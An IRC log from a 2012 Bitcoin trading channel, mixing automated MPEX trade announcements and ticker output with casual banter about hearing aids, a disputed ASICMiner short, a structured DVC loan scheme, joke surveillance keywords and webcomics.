02:05:25 No hearing devices that can help you? Nov 29 02:05:50 seems like an asshole tbh Nov 29 02:05:59 i have 500 euro hearing aids on each ear, they help immensely Nov 29 02:06:11 lots of noise, not much signal Nov 29 02:06:33 but my hearing is like mistuned radio... can't improve much Nov 29 02:06:38 Not sure what to say about that, make him type everything he says in IRC Nov 29 02:06:44 I know ive seen him in here before. Nov 29 02:06:56 dub you think that about everyone though. Nov 29 02:07:13 not really Nov 29 02:07:26 I dont have an opinion on him, never talked to him. Nov 29 02:08:19 i doubt you actually went into such inconvenience as to typing everything you say on the workshop, either Nov 29 02:08:41 Hehe I was kidding :) Nov 29 02:08:50 theres footage from other 'workshops' on you tube Nov 29 02:08:51 still, they said something about translation to slovak, but i don't hold my breath Nov 29 02:08:55 It just came out wrong Nov 29 02:09:22 i can't youtube. the generated scaptioning israrely useful. Nov 29 02:09:32 [MPEX] [S.MPOE] 7050 @ 0.00053035 = 3.739 BTC [+] Nov 29 02:09:33 [MPEX] [S.MPOE] 2345 @ 0.00053216 = 1.2479 BTC [+] Nov 29 02:09:35 [MPEX] [S.MPOE] 20421 @ 0.00053249 = 10.874 BTC [+] Nov 29 02:09:54 its not worth looking at anyway Nov 29 02:10:10 'bitcoins R REALLY COOL SO PROGRAM ANS STUFF K LOLZ" Nov 29 02:11:13 dub, so you actually have watched them and found lacking? Nov 29 02:11:40 I think he is approx as useful to bitcoin as MNW Nov 29 02:11:55 he makes us all look stupid for tolerating him Nov 29 02:13:09 haha. at least i'll feel better when i don't go Nov 29 02:13:18 Are there no devices for the your hearing that allow you to hear better from your pC? Nov 29 02:13:32 I'm just asking because I dont know and it would seem like a useful product. Nov 29 02:13:38 using my pc? Nov 29 02:14:10 Well you said the caption feature as useless so I asumed you turned it on because you had a hard time hearing the videos Nov 29 02:14:32 yes i do Nov 29 02:15:05 but it's hard guessing what was actually said sometimes Nov 29 02:15:42 and as for using PC i tried to set up jackd + equalizer/compressor for each ear extra, but it still wasn't as good as hearing aid... and the sound was stuttering Nov 29 02:15:45 Hmm, yeah doesent sound fun trying to guess something your already trying to learn. Nov 29 02:15:54 [MPEX] [S.MPOE] 2345 @ 0.00053239 = 1.2485 BTC [-] Nov 29 02:15:56 [MPEX] [S.MPOE] 1179 @ 0.00053249 = 0.6278 BTC [+] Nov 29 02:15:57 [MPEX] [S.MPOE] 2278 @ 0.00053261 = 1.2133 BTC [+] Nov 29 02:16:22 when i researched why, I was horrified to learn whole jack setup used 10GB of my 12G RAM Nov 29 02:16:45 Thats odd. Nov 29 02:17:43 decided that fixing jackd is not worth the effort Nov 29 02:18:08 [MPEX] [S.MPOE] 2345 @ 0.00052732 = 1.2366 BTC [-] Nov 29 02:18:08 [MPEX] [S.MPOE] 1595 @ 0.00052702 = 0.8406 BTC [-] Nov 29 02:18:10 [MPEX] [S.MPOE] 7558 @ 0.00052462 = 3.9651 BTC [-] Nov 29 02:18:11 [MPEX] [S.MPOE] 3779 @ 0.00052426 = 1.9812 BTC [-] Nov 29 02:18:45 Looks like there are headsets for hearing impaired as well, how do those work? Nov 29 02:19:09 I'm sure you have tried all of these things, I just found it interesting since I take it for granted. Nov 29 02:19:55 [MPEX] [S.MPOE] 2345 @ 0.00052434 = 1.2296 BTC [+] Nov 29 02:19:56 [MPEX] [S.MPOE] 6006 @ 0.00052426 = 3.1487 BTC [-] Nov 29 02:19:57 [MPEX] [S.MPOE] 14878 @ 0.00052391 = 7.7947 BTC [-] Nov 29 02:20:27 headsets (these are advertised for watching TV) usually have flat frequency reponse, so are useful mostly to people with equal hearing loss for all frequencies Nov 29 02:20:48 >headset Nov 29 02:20:51 >flat frequency Nov 29 02:20:52 but i have it all over the place between 40 and 90 dB Nov 29 02:20:53 LAWL Nov 29 02:21:18 [MPEX] [S.MPOE] 7872 @ 0.00052391 = 4.1242 BTC [-] Nov 29 02:21:19 [MPEX] [S.MPOE] 9584 @ 0.00052225 = 5.0052 BTC [-] Nov 29 02:21:21 [MPEX] [S.MPOE] 4688 @ 0.00052218 = 2.448 BTC [-] Nov 29 02:21:38 um, i would need to send an sms to umerrica mobile phone Nov 29 02:21:50 is there a service that can do that Nov 29 02:21:57 i dont need bulk 10k sms Nov 29 02:22:04 yes... another cell phone. Nov 29 02:22:38 http://www.google.com/mobile/sms/voice/ Nov 29 02:23:12 hmm Nov 29 02:23:15 interesting Nov 29 02:23:56 [MPEX] [S.MPOE] 7494 @ 0.00052218 = 3.9132 BTC [-] Nov 29 02:23:58 [MPEX] [S.MPOE] 3942 @ 0.0005217 = 2.0565 BTC [-] Nov 29 02:23:58 [MPEX] [S.MPOE] 14915 @ 0.00052152 = 7.7785 BTC [-] Nov 29 02:24:12 hm Nov 29 02:24:32 this doesnt allow me to send from here if i understand it correctly Nov 29 02:27:36 Interesting, see I learned something. Nov 29 02:31:48 [MPEX] [S.MPOE] 11200 @ 0.00052223 = 5.849 BTC [+] Nov 29 02:31:49 [MPEX] [S.MPOE] 3200 @ 0.00052235 = 1.6715 BTC [+] Nov 29 02:38:54 dont live in terrst countries den Nov 29 02:38:57 [MPEX] [S.MPOE] 9100 @ 0.00053169 = 4.8384 BTC [+] Nov 29 02:39:16 got damn terrsts Nov 29 02:41:25 let's put dub on homeland security radar: terrorist bomb assassination obama Nov 29 02:41:39 explosives Nov 29 02:41:47 my irc client has that built in Nov 29 02:42:06 -feds Nov 29 02:42:11 hrm Nov 29 02:42:13 what? you have homeland security plugin? Nov 29 02:43:33 a terrorst manual? Nov 29 02:45:14 domestic disruption Libya White House wire transfer radar FBI Nov 29 02:45:19 there we go Nov 29 02:45:22 HALO Glock 26 smuggle Diebold Lebed Fallujah Nov 29 02:45:25 Bush Waco wire transfer FSF Defense Information Warfare Terrorism Nov 29 02:45:29 DES Grass Roots 9-11 Al Amn al-Askari Saddam Hussein Ortega Nov 29 02:45:57 milk Nov 29 02:46:20 Liberals PLO Saddam Hussein SEAL Team 6 Ft. Bragg Mossad Nov 29 02:46:45 Serbian Al Qaeda Verisign $400 million in gold bullion colonel Ft. Meade Nov 29 02:46:58 thats to call teh gay spooks Nov 29 02:47:29 note: Gladamas_' timing Nov 29 02:51:21 gay matrix mode Nov 29 02:51:23 I a S t p T i r S K N K j Nov 29 02:51:26 n t e y u e s o t n o o i Nov 29 02:51:29 f i c t r m p e i r r h Nov 29 02:51:32 o o u C e r o a f t e a Nov 29 02:51:35 r n r o r o E l k e h a d Nov 29 02:51:38 m i m r u Nov 29 02:52:03 lol Nov 29 02:53:18 goodnight folks Nov 29 02:56:24 [MPEX] [S.MPOE] 2345 @ 0.00052299 = 1.2264 BTC [-] Nov 29 02:56:26 [MPEX] [S.MPOE] 355 @ 0.00052329 = 0.1858 BTC [+] Nov 29 02:58:18 I think he is approx as useful to bitcoin as MNW << i second Nov 29 03:00:04 [MPEX] [S.MPOE] 2345 @ 0.00052177 = 1.2236 BTC [-] Nov 29 03:00:06 [MPEX] [S.MPOE] 26955 @ 0.00052152 = 14.0576 BTC [-] Nov 29 03:16:19 [MPEX] [S.MPOE] 12900 @ 0.00052152 = 6.7276 BTC [-] Nov 29 03:16:21 [MPEX] [S.MPOE] 1550 @ 0.00052122 = 0.8079 BTC [-] Nov 29 03:18:29 hmm https://bitcointalk.org/index.php?topic=128289.0 Nov 29 03:19:11 [MPEX] [S.MPOE] 4514 @ 0.00052122 = 2.3528 BTC [-] Nov 29 03:19:12 [MPEX] [S.MPOE] 14736 @ 0.00052119 = 7.6803 BTC [-] Nov 29 03:22:35 [MPEX] [S.MPOE] 16864 @ 0.00052119 = 8.7893 BTC [-] Nov 29 03:22:37 [MPEX] [S.MPOE] 16836 @ 0.00052105 = 8.7724 BTC [-] Nov 29 03:29:19 [MPEX] [S.MPOE] 2345 @ 0.00052147 = 1.2228 BTC [+] Nov 29 03:29:20 [MPEX] [S.MPOE] 5673 @ 0.0005215 = 2.9585 BTC [+] Nov 29 03:39:53 [MPEX] [S.MPOE] 7000 @ 0.00052116 = 3.6481 BTC [-] Nov 29 03:44:43 [MPEX] [S.MPOE] 20500 @ 0.00052116 = 10.6838 BTC [-] Nov 29 03:44:45 [MPEX] [S.MPOE] 3500 @ 0.0005215 = 1.8253 BTC [+] Nov 29 03:49:19 [MPEX] [S.MPOE] 2345 @ 0.00052142 = 1.2227 BTC [-] Nov 29 03:49:19 [MPEX] [S.MPOE] 1622 @ 0.0005215 = 0.8459 BTC [+] Nov 29 03:49:21 [MPEX] [S.MPOE] 25700 @ 0.00052257 = 13.43 BTC [+] Nov 29 03:49:22 [MPEX] [S.MPOE] 633 @ 0.00052329 = 0.3312 BTC [+] Nov 29 03:53:47 [MPEX] [S.MPOE] 168 @ 0.00052329 = 0.0879 BTC [+] Nov 29 03:53:48 [MPEX] [S.MPOE] 3982 @ 0.00052498 = 2.0905 BTC [+] Nov 29 04:07:12 [MPEX] [S.MPOE] 2345 @ 0.00052127 = 1.2224 BTC [-] Nov 29 04:07:14 [MPEX] [S.MPOE] 9055 @ 0.00052105 = 4.7181 BTC [-] Nov 29 04:08:41 [MPEX] [S.MPOE] 2345 @ 0.00052139 = 1.2227 BTC [+] Nov 29 04:08:42 [MPEX] [S.MPOE] 2559 @ 0.00052105 = 1.3334 BTC [-] Nov 29 04:08:44 [MPEX] [S.MPOE] 8062 @ 0.00052083 = 4.1989 BTC [-] Nov 29 04:08:45 [MPEX] [S.MPOE] 8500 @ 0.00052009 = 4.4208 BTC [-] Nov 29 04:08:46 [MPEX] [S.MPOE] 12044 @ 0.00051993 = 6.262 BTC [-] Nov 29 04:08:47 [MPEX] [S.MPOE] 900 @ 0.00051982 = 0.4678 BTC [-] Nov 29 04:08:47 [MPEX] [S.MPOE] 17900 @ 0.00051937 = 9.2967 BTC [-] Nov 29 04:08:49 [MPEX] [S.MPOE] 6490 @ 0.00051935 = 3.3706 BTC [-] Nov 29 04:12:48 [MPEX] [S.MPOE] 2345 @ 0.00052465 = 1.2303 BTC [+] Nov 29 04:12:49 [MPEX] [S.MPOE] 8755 @ 0.00052498 = 4.5962 BTC [+] Nov 29 04:17:02 oh yeah, my sig is the biggest http://trilema.com/2012/the-mpex-rota/ Nov 29 04:17:50 kakobreklaaa: you're still on sha1? Nov 29 04:18:10 [MPEX] [S.MPOE] 2345 @ 0.00052487 = 1.2308 BTC [-] Nov 29 04:18:12 [MPEX] [S.MPOE] 13612 @ 0.00052498 = 7.146 BTC [+] Nov 29 04:19:08 i live a dangerous life Nov 29 04:19:38 hehe this is going nice, already 3 ppl. Nov 29 04:19:45 which is technically enough to have a trial. Nov 29 04:20:19 Namjies: you should sue mircea_popescu for not redeeming or whatever your gigamining shares ;) Nov 29 04:20:41 except he's paying the judges i hear Nov 29 04:20:48 no i'm not Nov 29 04:20:54 well... mpex is, but that's besides the point Nov 29 04:21:55 [MPEX] [S.MPOE] 2345 @ 0.00051949 = 1.2182 BTC [-] Nov 29 04:21:56 [MPEX] [S.MPOE] 4360 @ 0.00051935 = 2.2644 BTC [-] Nov 29 04:21:58 [MPEX] [S.MPOE] 4500 @ 0.0005187 = 2.3342 BTC [-] Nov 29 04:21:59 [MPEX] [S.MPOE] 95 @ 0.00051842 = 0.0492 BTC [-] Nov 29 04:22:25 pigeons i suspekt he's gonna sue me anyway for the asicminer deal. that's actually an interesting thing anyway Nov 29 04:23:10 what's that about? Nov 29 04:23:19 oh my, that's a interesting one Nov 29 04:23:33 GFC is trying to figure out details for a structured credit default swap in which they will loan 10,000 DVC each to 10,000 people, in four or five tranches. The tranches are to be of four or five different levels of collateral, with 100% being the level that maybe need not be a tracnch, naybe its best to keep the 100%-collateral people to themselves instead of putting them in the structured thing Nov 29 04:23:52 pigeons well i can't talk about it if im getting sued Nov 29 04:23:53 mircea_popescu: can i tell him :) Nov 29 04:23:58 aw Nov 29 04:24:06 polimedia.us/bitcoin/mphf.txt Nov 29 04:24:08 smickles: where are you gonna find 10,000 people? Nov 29 04:24:08 there, contract Nov 29 04:24:11 sure you can smickles Nov 29 04:24:11 i could present a work of fiction Nov 29 04:24:15 sorry i meant knotwork Nov 29 04:24:23 pigeons: mircea_popescu shorted asicminer, borrowing from Namjies then glbse tanked. Nov 29 04:24:51 i heard asicminer had accounting of large shareholders outside of the glbse system? Nov 29 04:25:01 this was thru glbse Nov 29 04:25:29 has asicminer been given a list from the good doctor nefario yet? Nov 29 04:25:31 pigeons GRouPcorp is group-oriented, lots of groups not all being small groups adds up to a lot of people, this intial 10,000 is just the first batch, to test out the sructured vehicle idea Nov 29 04:25:46 [MPEX] [S.MPOE] 2345 @ 0.00052491 = 1.2309 BTC [+] Nov 29 04:25:46 pigeons don't prejudge or else! Nov 29 04:25:47 [MPEX] [S.MPOE] 7884 @ 0.00052498 = 4.1389 BTC [+] Nov 29 04:25:48 [MPEX] [S.MPOE] 23371 @ 0.00053176 = 12.4278 BTC [+] Nov 29 04:25:49 [MPEX] [S.BVPS] 5000 @ 0.00289998 = 14.4999 BTC [+] Nov 29 04:25:50 [MPEX] [S.BVPS] 1000 @ 0.00289999 = 2.9 BTC [+] Nov 29 04:25:51 [MPEX] [S.BVPS] 42654 @ 0.0029 = 123.6966 BTC [+] Nov 29 04:25:53 [MPEX] [S.BVPS] 2168 @ 0.00299414 = 6.4913 BTC [+] Nov 29 04:25:54 [MPEX] [S.BVPS] 1500 @ 0.00300004 = 4.5001 BTC [+] Nov 29 04:25:55 [MPEX] [S.BVPS] 2500 @ 0.00310004 = 7.7501 BTC [+] Nov 29 04:25:56 [MPEX] [S.BVPS] 4626 @ 0.0032 = 14.8032 BTC [+] Nov 29 04:25:57 pigeons: I think they have received the partial list Nov 29 04:26:03 ok i dont want to hear it then ;) Nov 29 04:26:08 lalala Nov 29 04:26:17 lol Nov 29 04:26:21 ha Nov 29 04:26:52 http://polimedia.us/dtng/c/src/135336393763.jpg Nov 29 04:27:06 whoa bvps sold Nov 29 04:27:21 mircea_popescu: sold? Nov 29 04:27:46 yeah ? Nov 29 04:27:47 under the news of a possible buyout or screw-off Nov 29 04:27:50 [MPEX] [S.BVPS] 42654 @ 0.0029 = 123.6966 BTC [+] Nov 29 04:28:11 !ticker s.bvps Nov 29 04:28:13 [MPEX:S.BVPS] 1day: 0.00289998 / 0.00293771 / 0.0032 (59448 shares, 174.64 BTC), 30day: 0.002 / 0.00265776 / 0.0032 (92264 shares, 245.22 BTC) Nov 29 04:28:13 grubles: wake up Nov 29 04:28:16 they could do a smaller test first i suppose, start with the first 1000 people on the waiting list and loan them each 100,000 dvc and see how it goes Nov 29 04:28:23 like 2/3 of its volume today lol Nov 29 04:28:24 ah, in prevision of the dividend arriving soon I presume Nov 29 04:28:41 2/3 of the volume? Nov 29 04:29:03 ;;calc 174.64 / 245.22 Nov 29 04:29:03 0.712176820814 Nov 29 04:29:15 rg_: Nov 29 04:29:28 pigeons also in reality its best not to think of them as people, since really they are basically just pseudonymous identities Nov 29 04:29:47 [MPEX] [S.MPOE] 2345 @ 0.00051868 = 1.2163 BTC [-] Nov 29 04:29:48 [MPEX] [S.MPOE] 14240 @ 0.00051842 = 7.3823 BTC [-] Nov 29 04:29:50 brokers can perfectly well generate a bunch of identities themselves to include in Nov 29 04:29:56 knotwork: how many players in galactic milieu? Nov 29 04:30:47 pigeons if you count this lot I have no idea, there is no way of knowing the average ratio of actual live humans to sock puppet pseudonyms Nov 29 04:31:02 how many including sock puppets Nov 29 04:31:20 well 10,000 lines up wanting loans, for starters. Nov 29 04:31:49 there are hundreds of people in various subgames that have maybe never played since they signed up too, wanna count idlers too? Nov 29 04:32:18 i'm one of those :) Nov 29 04:32:24 alright, i get it, somewhere between a little and a lot Nov 29 04:32:40 oh well who counts smickles? hahahaha ;) Nov 29 04:32:48 :o Nov 29 04:32:53 count smickles my dear earl. Nov 29 04:32:53 hehe Nov 29 04:33:11 ok well how many thousands is he alone then? :) Nov 29 04:34:10 i see you've all attracted ciuciu Nov 29 04:34:36 part of the function of this structured thing is to try to come up with vehicles that do not care whether their counterparties are one human a billion humans one corp or hundreds of corps etc Nov 29 04:35:09 I can't help attracting ciuciu, that character is like jeph jaques' squirrel with a massive boner Nov 29 04:35:25 but not as entertaining Nov 29 04:35:26 though I suppose pretending to structure one person into several tranches is maybe a little pointless Nov 29 04:35:45 ;;google jeph jaques' squirrel Nov 29 04:35:46 Questionable Content - Television Tropes & Idioms: ; Archive - Questionable Content: New comics every Monday through ...: ; Dayuse @ Paradise Toronto Comicon - Part II - YouTube: Nov 29 04:36:00 fuck me. not tvtropes. Nov 29 04:36:04 NOOOOOooooooo....... Nov 29 04:36:24 I had no idea there was a tvtropes on QC Nov 29 04:37:46 A Catholic annulment is analogous to a finding that a contract of sale is invalid Nov 29 04:37:49 ok, this works. Nov 29 04:40:35 gwaa, it would help if i could at least remember which art style phase the squirrel first appeared in Nov 29 04:43:55 lol http://www.questionablecontent.net/view.php?comic=874 Nov 29 04:46:17 [MPEX] [S.MPOE] 2345 @ 0.00052278 = 1.2259 BTC [+] Nov 29 04:46:17 [MPEX] [S.MPOE] 16855 @ 0.00052256 = 8.8077 BTC [-] Nov 29 04:49:38 even if we never know whether all the people one broker represents really exist or are just sockpuppets of the broker the brokers can gain useful info from this about their customers even if they keep everyone else in the dark about whether those customers actually exist at all Nov 29 04:50:07 [MPEX] [S.DICE] 1300 @ 0.00334633 = 4.3502 BTC [-] Nov 29 04:50:09 [MPEX] [S.DICE] 3982 @ 0.003347 = 13.3278 BTC [+] Nov 29 04:50:10 [MPEX] [S.DICE] 2300 @ 0.00336737 = 7.745 BTC [+] Nov 29 04:50:11 [MPEX] [S.DICE] 3400 @ 0.00337549 = 11.4767 BTC [+] Nov 29 04:50:13 [MPEX] [S.DICE] 9018 @ 0.00338808 = 30.5537 BTC [+] Nov 29 04:51:06 also if all the customers of a broker default that is useful info to know about that broker Nov 29 04:51:30 mircea_popescu: i'm not going to look for it anymore, the squirrel is in like 3 out of 2330 strips Nov 29 04:51:33 :P Nov 29 04:51:45 :p Nov 29 04:52:04 hmm Nov 29 04:52:05 https://groups.google.com/forum/?fromgroups=#!topic/rippleusers/IVin3Qwrp7k Nov 29 04:54:15 [MPEX] [S.DICE] 464 @ 0.00338808 = 1.5721 BTC [+] Nov 29 04:54:17 future access to various tranches of future runs of the concept could also be contingent on the performance of a broker's customers in previous runs Nov 29 04:54:25 [MPEX] [S.MPOE] 2345 @ 0.00052607 = 1.2336 BTC [+] Nov 29 04:54:27 [MPEX] [S.MPOE] 2305 @ 0.00052622 = 1.2129 BTC [+] Nov 29 04:54:51 thus some brokers might eat some losses themselves rather than be perceived as a broker who caters to deadbeats Nov 29 04:56:43 mircea_popescu: oh nvm, he's on with him http://questionablecontent.net/view.php?comic=1901 Nov 29 04:56:56 kakobreklaaa: Their system is based on a Bitcoin-style blockchain, much as we have Nov 29 04:56:59 discussed here over the last few years as an interesting possibility, Nov 29 04:57:01 but with a novel miner-less consensus mechanism that allows Nov 29 04:57:03 transactions to be confirmed nearly instantaneously. Nov 29 04:57:05 pastefail Nov 29 04:57:08 or in order to qualify to move up from devcoin based vehicles to litecoin so as to eventually advance to even higher coins Nov 29 04:57:46 hm Nov 29 04:57:49 so how do you print it Nov 29 04:59:49 hey thats YELLINGBIRD Nov 29 05:00:36 mircea_popescu She looks very similar to my ex Nov 29 05:00:53 apparently his ex didn't like that comment. Nov 29 05:01:54 [MPEX] [S.MPOE] 2345 @ 0.00052288 = 1.2262 BTC [-] Nov 29 05:01:55 [MPEX] [S.MPOE] 4490 @ 0.00052256 = 2.3463 BTC [-] Nov 29 05:03:38 [MPEX] [S.MPOE] 13355 @ 0.00052256 = 6.9788 BTC [-] Nov 29 05:03:39 [MPEX] [S.MPOE] 20973 @ 0.00052152 = 10.9378 BTC [-] Nov 29 05:03:41 [MPEX] [S.MPOE] 8472 @ 0.00051855 = 4.3932 BTC [-] Nov 29 05:04:57 maybe it's a cat Nov 29 05:04:59 i dunno Nov 29 05:05:52 lol i don't really care about cartoons, dun sweat it Nov 29 05:15:26 [MPEX] [S.MPOE] 2345 @ 0.00052616 = 1.2338 BTC [+] Nov 29 05:15:27 [MPEX] [S.MPOE] 11145 @ 0.00052622 = 5.8647 BTC [+] Nov 29 05:15:29 [MPEX] [S.MPOE] 4867 @ 0.00052872 = 2.5733 BTC [+] Nov 29 05:15:30 [MPEX] [S.MPOE] 1093 @ 0.00053176 = 0.5812 BTC [+] Nov 29 05:21:04 ;;bc,stats Nov 29 05:21:07 Current Blocks: 210085 | Current Difficulty: 3438908.9601591 | Next Difficulty At Block: 211679 | Next Difficulty In: 1594 blocks | Next Difficulty In About: 1 week, 3 days, 3 hours, 31 minutes, and 40 seconds | Next Difficulty Estimate: 3776113.86628476 | Estimated Percent Change: 9.80557816541 Nov 29 05:30:57 [MPEX] [S.DICE] 1298 @ 0.00334406 = 4.3406 BTC [-] Nov 29 05:30:59 [MPEX] [S.DICE] 3811 @ 0.00334635 = 12.7529 BTC [+] Nov 29 05:30:59 [MPEX] [S.DICE] 1000 @ 0.00336242 = 3.3624 BTC [+] Nov 29 05:31:00 [MPEX] [S.DICE] 291 @ 0.00339999 = 0.9894 BTC [+] Nov 29 05:33:00 ;;ticker Nov 29 05:33:01 BTCUSD ticker | Best bid: 12.26503, Best ask: 12.36650, Bid-ask spread: 0.10147, Last trade: 12.26402, 24 hour volume: 26466.34567538, 24 hour low: 12.17100, 24 hour high: 12.40712, 24 hour vwap: 12.29692 Nov 29 05:33:17 !ticker s.dice Nov 29 05:33:19 [MPEX:S.DICE] 1day: 0.00332186 / 0.00335463 / 0.00339999 (47804 shares, 160.37 BTC), 30day: 0.00180002 / 0.00332535 / 0.0034 (1081283 shares, 3,595.65 BTC) Nov 29 05:35:12 [MPEX] [O.BTCUSD.C070T] 1000 @ 0.43032464 = 430.3246 BTC [+] Nov 29 05:35:35 [MPEX] [S.MPOE] 2345 @ 0.0005315 = 1.2464 BTC [-] Nov 29 05:35:37 [MPEX] [S.MPOE] 5636 @ 0.00053176 = 2.997 BTC [+] Nov 29 05:35:38 [MPEX] [S.MPOE] 1000 @ 0.00053183 = 0.5318 BTC [+] Nov 29 05:35:39 [MPEX] [S.MPOE] 2969 @ 0.00053184 = 1.579 BTC [+] Nov 29 05:38:39 [MPEX] [O.BTCUSD.C080T] 1000 @ 0.34851387 = 348.5139 BTC [+] Nov 29 05:39:41 [MPEX] [S.MPOE] 2345 @ 0.00052675 = 1.2352 BTC [-] Nov 29 05:39:43 [MPEX] [S.MPOE] 5205 @ 0.00052654 = 2.7406 BTC [-] Nov 29 05:39:48 [MPEX] [S.DICE] 50000 @ 0.00333334 = 166.667 BTC [-] Nov 29 05:39:48 [MPEX] [S.DICE] 3550 @ 0.00333263 = 11.8308 BTC [-] Nov 29 05:39:51 [MPEX] [S.DICE] 1100 @ 0.00332583 = 3.6584 BTC [-] Nov 29 05:39:52 [MPEX] [S.DICE] 5544 @ 0.00332186 = 18.4164 BTC [-] Nov 29 05:39:52 [MPEX] [S.DICE] 1785 @ 0.00331717 = 5.9211 BTC [-] Nov 29 05:39:53 [MPEX] [S.DICE] 4200 @ 0.0033154 = 13.9247 BTC [-] Nov 29 05:39:54 [MPEX] [S.DICE] 3394 @ 0.00331508 = 11.2514 BTC [-] Nov 29 05:41:01 [MPEX] [O.BTCUSD.C080T] 1000 @ 0.34851387 = 348.5139 BTC [+] Nov 29 05:42:05 !ticker s.dice Nov 29 05:42:06 [MPEX:S.DICE] 1day: 0.00331508 / 0.00333996 / 0.00339999 (117377 shares, 392.03 BTC), 30day: 0.00180002 / 0.00332562 / 0.0034 (1150856 shares, 3,827.32 BTC) Nov 29 05:42:07 [MPEX] [O.BTCUSD.C070T] 1000 @ 0.43032464 = 430.3246 BTC [+] Nov 29 05:42:18 volumetric day lol Nov 29 05:44:46 [MPEX] [O.BTCUSD.P170T] 1 @ 0.38778304 BTC [-] Nov 29 05:44:51 yup, end of the month, dividends coming in. People go around shopping. Nov 29 05:46:05 indeed. Nov 29 05:47:45 [MPEX] [S.MPOE] 2345 @ 0.00053183 = 1.2471 BTC [+] Nov 29 05:47:47 [MPEX] [S.MPOE] 7170 @ 0.00053184 = 3.8133 BTC [+] Nov 29 05:47:48 [MPEX] [S.MPOE] 15648 @ 0.00053191 = 8.3233 BTC [+] Nov 29 05:47:49 [MPEX] [S.MPOE] 17280 @ 0.00053261 = 9.2035 BTC [+] Nov 29 05:47:49 [MPEX] [S.MPOE] 11688 @ 0.00053537 = 6.2574 BTC [+] Nov 29 05:47:51 [MPEX] [S.MPOE] 14250 @ 0.00053537 = 7.629 BTC [+] Nov 29 05:47:52 [MPEX] [S.MPOE] 14738 @ 0.00053542 = 7.891 BTC [+] Nov 29 05:47:53 [MPEX] [S.MPOE] 2495 @ 0.00053546 = 1.336 BTC [+] Nov 29 05:47:54 [MPEX] [S.MPOE] 16400 @ 0.00053552 = 8.7825 BTC [+] Nov 29 05:47:55 [MPEX] [S.MPOE] 1700 @ 0.00053567 = 0.9106 BTC [+] Nov 29 05:47:56 [MPEX] [S.MPOE] 1000 @ 0.00053573 = 0.5357 BTC [+] Nov 29 05:47:57 [MPEX] [S.MPOE] 17350 @ 0.00053574 = 9.2951 BTC [+] Nov 29 05:47:58 [MPEX] [S.MPOE] 18790 @ 0.00053589 = 10.0694 BTC [+] Nov 29 05:48:00 [MPEX] [S.MPOE] 25600 @ 0.00053607 = 13.7234 BTC [+] Nov 29 05:48:00 [MPEX] [S.MPOE] 7000 @ 0.00053608 = 3.7526 BTC [+] Nov 29 05:48:01 [MPEX] [S.MPOE] 20800 @ 0.00053611 = 11.1511 BTC [+] Nov 29 05:48:02 [MPEX] [S.MPOE] 19507 @ 0.00053618 = 10.4593 BTC [+] Nov 29 05:48:03 [MPEX] [S.MPOE] 10200 @ 0.00053618 = 5.469 BTC [+] Nov 29 05:48:04 [MPEX] [S.MPOE] 36400 @ 0.00053634 = 19.5228 BTC [+] Nov 29 05:48:05 [MPEX] [S.MPOE] 24000 @ 0.00053663 = 12.8791 BTC [+] Nov 29 05:48:06 [MPEX] [S.MPOE] 21760 @ 0.00053673 = 11.6792 BTC [+] Nov 29 05:48:07 [MPEX] [S.MPOE] 12128 @ 0.00053675 = 6.5097 BTC [+] Nov 29 05:48:08 [MPEX] [S.MPOE] 20000 @ 0.0005368 = 10.736 BTC [+] Nov 29 05:48:09 [MPEX] [S.MPOE] 9788 @ 0.00053682 = 5.2544 BTC [+] Nov 29 05:48:09 [MPEX] [S.MPOE] 1000 @ 0.00053696 = 0.537 BTC [+] Nov 29 05:48:10 [MPEX] [S.MPOE] 18400 @ 0.00053697 = 9.8802 BTC [+] Nov 29 05:48:11 [MPEX] [S.MPOE] 10900 @ 0.00053715 = 5.8549 BTC [+] Nov 29 05:48:12 [MPEX] [S.MPOE] 21663 @ 0.00053718 = 11.6369 BTC [+] Nov 29 05:56:16 [MPEX] [O.BTCUSD.P140T] 1000 @ 0.17734109 = 177.3411 BTC [-] Nov 29 05:56:26 [MPEX] [O.BTCUSD.P130T] 1000 @ 0.09182915 = 91.8292 BTC [-] Nov 29 05:56:41 [MPEX] [O.BTCUSD.P120T] 1000 @ 0.05496801 = 54.968 BTC [-] Nov 29 05:56:54 [MPEX] [O.BTCUSD.P110T] 1000 @ 0.05496801 = 54.968 BTC [-] Nov 29 06:01:01 [MPEX] [S.MPOE] 2345 @ 0.00052808 = 1.2383 BTC [-] Nov 29 06:01:03 [MPEX] [S.MPOE] 13905 @ 0.00052782 = 7.3393 BTC [-] Nov 29 06:02:23 [MPEX] [O.BTCUSD.P110T] 1000 @ 0.050857 = 50.857 BTC [-] Nov 29 06:02:50 [MPEX] [O.BTCUSD.P120T] 1000 @ 0.050857 = 50.857 BTC [-] Nov 29 06:02:56 [MPEX] [O.BTCUSD.P130T] 1000 @ 0.0917533 = 91.7533 BTC [-] Nov 29 06:03:10 [MPEX] [O.BTCUSD.P140T] 1000 @ 0.17730597 = 177.306 BTC [-] Nov 29 06:11:33 time to meet a man about a mortgage Nov 29 06:11:40 [MPEX] [O.BTCUSD.C100N] 1000 @ 0.23392633 = 233.9263 BTC [-] Nov 29 06:12:02 [MPEX] [O.BTCUSD.C110N] 800 @ 0.19838339 = 158.7067 BTC [-] Nov 29 06:12:11 [MPEX] [O.BTCUSD.C120N] 600 @ 0.16784624 = 100.7077 BTC [-] Nov 29 06:12:24 [MPEX] [O.BTCUSD.C130N] 400 @ 0.12905362 = 51.6214 BTC [-] Nov 29 06:12:55 [MPEX] [O.BTCUSD.C140N] 200 @ 0.09478752 = 18.9575 BTC [-] Nov 29 06:21:55 [MPEX] [S.MPOE] 2345 @ 0.00053714 = 1.2596 BTC [+] Nov 29 06:21:57 [MPEX] [S.MPOE] 1000 @ 0.00053717 = 0.5372 BTC [+] Nov 29 06:30:56 [MPEX] [S.MPOE] 2345 @ 0.00052803 = 1.2382 BTC [-] Nov 29 06:30:57 [MPEX] [S.MPOE] 5255 @ 0.00052782 = 2.7737 BTC [-] **** BEGIN LOGGING AT Thu Nov 29 18:28:29 2012 Nov 29 18:30:24 what did i miss Nov 29 18:31:04 ;;ticker Nov 29 18:31:05 BTCUSD ticker | Best bid: 12.47835, Best ask: 12.47836, Bid-ask spread: 0.00001, Last trade: 12.47835, 24 hour volume: 29050.39462363, 24 hour low: 12.15000, 24 hour high: 12.59900, 24 hour vwap: 12.35523 Nov 29 18:32:52 kakobreklaaa ukto has a new exchange at bitfunder.com prolly wanna add it Nov 29 18:34:30 is it live yet? Nov 29 18:34:47 nope Nov 29 18:34:53 i still have my 10 playbtc on it Nov 29 18:35:03 lets buy some stuff Nov 29 18:36:12 mircea_popescu: the market/asset pages are public now Nov 29 18:36:18 umm Nov 29 18:36:22 what is this dog? Nov 29 